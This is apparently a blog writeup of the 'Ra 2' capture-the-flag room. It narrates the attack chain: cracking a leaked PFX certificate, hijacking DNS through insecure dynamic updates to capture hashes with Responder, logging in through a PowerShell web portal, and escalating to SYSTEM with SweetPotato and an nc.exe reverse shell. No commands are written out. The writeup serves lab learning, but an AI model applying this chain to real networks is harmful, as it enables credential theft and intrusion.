Ra 2 Writeup

 


Ra 2 Link


Enumeration




Taking a look at the initial nmap scan it appears we are looking at a somewhat similar setup to what we had in the first Ra box. Lets take a look at the website and see if we have another intranet to look at.


Instantly we get redirected to fire.windcorp.thm, so lets add the domain and subdomain to our /etc/hosts file and take a look.


Taking a look at the intranet site, we can see that there is no longer the password reset link but a selfservice one is present, so we'll definitely be taking a look at that. Other than that, the rest of the site looks relatively the same.


Taking a look at the selfservice section we can see we get redirected to another subdomain we need to add to our hosts file and when we try access the page we get prompted for basic authentication, so it seems we aren't going to be able to access this just yet, lets go back and keep enumerating.


Taking a quick look at the certificate we can see there's also a selfservice.dev.windcorp.thm domain, that definitely could be interesting so let's add that to our hosts file and see what we have.


Interesting, we have a page that says under construction. A quick look through the source doesn't reveal anything so let's run this site through gobuster and see if we can find any hidden directories.


Looks like we have a couple of interesting directories to take a look at, let's start with the backup directory and see what is in there.


Looks like we have a cert pfx file and a config file, lets download these files and take a look at them to see if we can find anything.

Trying to download the web.config file results in a 404 which is interesting, but we're able to download the cert.pfx file.

Lets move onto the aspnet_client directory, we can exploit the directory by searching the subdirectory system_web for version numbers which will give us the version running.


Looks like the running version is 4.0.30319, probably not much use but it's just an extra bit of information.

Let's scan the main intranet portal and see if we can find anything of interest.


Nothing really interesting here, maybe we can try a larger wordlist and see if we get anything, I'll probably omit extensions with a larger list though otherwise we will be waiting hours for the results.


Taking a look at our initial scan results we can see a powershell directory which redirects to an aspx page, lets take a look at this.


Interesting, we still need credentials to access this page though which doesn't help us right now but we need to remember it.

Exploitation


Lets load up dnsrecon and see if there's any other domains we're missing as it doesn't seem like there's anything here, we can use currently to get access.


Taking a look we can see there's a txt record which looks to be the first flag and also gives us our first hint which seems to be that the server allows non secure dynamic updates to dns records, this will certainly come in handy, first we need to try crack the password on that pfx file so we can extract the files and update the dns records.


Using crackpkcs12 we were able to find the password for the pfx file so we can now extract our crt and key files.




First we extract the crt file, then we extract our key file, the key file gets encrypted with a pass phrase when we extract it, so we then need to decrypt it to make it usable in the next steps.


First before we can use responder to capture our malicious dns entry that we will create, we need to edit the /etc/responder/Responder.conf file so that it uses the correct certificate files that we just extracted.




After starting up responder we can go ahead and update the dns records on the server using nsupdate.
First we need to delete the existing record and then we can go ahead and update the A record so that it points to our ip address that responder is listening on.


And there we go we have it, weirdly there's 2 hashes that have been returned so I'll work with the second hash and be cracking that as that's most likely going to be the one we want.


And there we have it, we have some credentials, lets try enter these into the powershell page we found and see if we can establish a connection to a machine.



And there we have it. Now we can go grab our next flag and start enumerating the machine.



Taking a quick look around edwardle's directories there's not much of interest, in the documents folder we can see a cmd file, taking a quick look at that it just checks to see if the selfservice portal is working still. 

PrivEsc


We can also see in the downloads folder a couple of exe files, one is nc.exe and the other is SweetPotato.exe. SweetPotato.exe is an interesting one as it is effectively the same as juicypotato which will allow us to gain system level permissions provided our user has SeImpersonate or SeAssignPrimaryToken privileges, so lets check to see if our user has any of these privileges.


And it looks like we do, lets see if we can get sweetpotato to establish a reverse shell with system privileges using nc.exe




And there we have it, as you can see we are now the system user, we can now go ahead and grab our 3rd and final flag!
It's probably worth noting that usually you wouldn't find a precompiled version of sweetpotato.exe sitting on a machine (I'd hope), I think the room creators decided to make this one a little easier by having a precompiled version there so we don't need to go off and compile it ourselves.









Comments

Post a Comment

Popular posts from this blog

Biteme Writeup

Image
  Biteme link Enumeration Firing up nmap we can see that we have 2 ports open, 22(ssh) and 80(http), let's take a quick look at the webserver first and see what's running on it. Just the default apache page, lets run gobuster and see if we can find any directories. Looking at gobuster we only seem to have the one directory, /console/  so let's take a look at that, we may need to possibly run a bigger wordlist later if we can't net anything from this. Interesting, we have a login page with a captcha, taking a quick look at the page source doesn't reveal any hidden details so let's take a look at what happens and what data is submitted when we attempt to login. Interesting, it seems there was a message logged to the console when we attempted to sign in stating that php file syntax highlighting has been turned on. We can also see that when we submit a sign in attempt there is an extra variable of clicked = yes. Lets run a quick gobuster scan on the console director...
Read more

0day Writeup

Image
  0day link Enumeration Running an initial nmap scan we can see that we have port 80 and 22 open, so lets start by taking a look at the website to see what we have. Nothing exciting on the main page and looking into the page source we don't have much so lets run gobuster and see what that brings us back. Gobuster returns a whole bunch of interesting directories, we'll start by looking at robots.txt just incase there's anything extra listed in their that gobuster didn't find and then we'll slowly start working through each of the folders that returned a 301 redirect. Nothing really interesting on any of the directories, mainly looks to be a bunch of rabbit holes, the /backup/  directory did have a private rsa key in it though which we'll copy and save for later just incase, but we don't have a known user that it could be associated with so it's not much use. Next step would be to look for exploits, usually with /cgi-bin/  exposed we'd be hoping for an...
Read more

Olympus Writeup

Image
  Olympus link Enumeration Starting off with a nmap scan we can see that we have two ports open, 22(ssh) and 80(http), let's start by taking a look at the web server first. Looks like we instantly get redirected to olympus.thm so we need to make sure we add this to our /etc/hosts  file. Once we get to the website we can see that there is a message letting us know that we can still visit the old version of the website on this domain, so lets run gobuster and see if we can find a directory that will take us there. Taking a look at the gobuster scan we can see that we have a /~webmaster/  directory so we should go check that out, we can also see that the site is running a mysql db based on the /phpmyadmin/ Looks like we have a pretty basic CMS system, there's some interesting details on this page other than the Admin and Register links, we should probably go look for that wordlist quickly, we can also run another gobuster scan on this directory as well to see if we find anyt...
Read more